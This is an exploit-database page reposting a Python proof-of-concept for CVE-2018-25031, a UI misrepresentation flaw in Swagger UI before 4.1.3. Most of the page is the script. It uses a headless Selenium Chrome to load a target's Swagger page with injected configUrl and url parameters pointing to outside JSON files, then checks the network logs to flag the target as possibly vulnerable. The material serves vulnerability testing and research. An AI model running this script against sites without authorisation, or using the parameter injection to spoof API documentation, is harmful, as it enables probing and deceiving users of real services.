Swagger UI 4.1.3 Critical Information Misrepresentation
CVE
Category
Price
Severity
CVE-2018-25031
CWE-200
$500
Critical
Author
Risk
Exploitation Type
Date
Unknown
High
Remote
2023-04-21
CPE
cpe:cpe:/a:swagger-ui:swagger-ui:4.1.3
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023040068 Below is a copy:
Swagger UI 4.1.3 Critical Information Misrepresentation # Exploit Title: Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information
# Date: 14 April, 2023
# Exploit Author: Rafael Cintra Lopes
# Vendor Homepage: https://swagger.io/
# Version: < 4.1.3
# CVE: CVE-2018-25031
# Site: https://rafaelcintralopes.com.br/
# Usage: python swagger-exploit.py https://[swagger-page].com
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.chrome.service import Service
import time
import json
import sys
if __name__ == "__main__":
target = sys.argv[1]
desired_capabilities = DesiredCapabilities.CHROME
desired_capabilities["goog:loggingPrefs"] = {"performance": "ALL"}
options = webdriver.ChromeOptions()
options.add_argument("--headless")
options.add_argument("--ignore-certificate-errors")
options.add_argument("--log-level=3")
options.add_experimental_option("excludeSwitches", ["enable-logging"])
# Browser webdriver path
drive_service = Service("C:/chromedriver.exe")
driver = webdriver.Chrome(service=drive_service,
options=options,
desired_capabilities=desired_capabilities)
driver.get(target+"?configUrl=https://petstore.swagger.io/v2/hacked1.json")
time.sleep(10)
driver.get(target+"?url=https://petstore.swagger.io/v2/hacked2.json")
time.sleep(10)
logs = driver.get_log("performance")
with open("log_file.json", "w", encoding="utf-8") as f:
f.write("[")
for log in logs:
log_file = json.loads(log["message"])["message"]
if("Network.response" in log_file["method"]
or "Network.request" in log_file["method"]
or "Network.webSocket" in log_file["method"]):
f.write(json.dumps(log_file)+",")
f.write("{}]")
driver.quit()
json_file_path = "log_file.json"
with open(json_file_path, "r", encoding="utf-8") as f:
logs = json.loads(f.read())
for log in logs:
try:
url = log["params"]["request"]["url"]
if(url == "https://petstore.swagger.io/v2/hacked1.json"):
print("[Possibly Vulnerable] " + target + "?configUrl=https://petstore.swagger.io/v2/swagger.json")
if(url == "https://petstore.swagger.io/v2/hacked2.json"):
print("[Possibly Vulnerable] " + target + "?url=https://petstore.swagger.io/v2/swagger.json")
except Exception as e:
pass
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum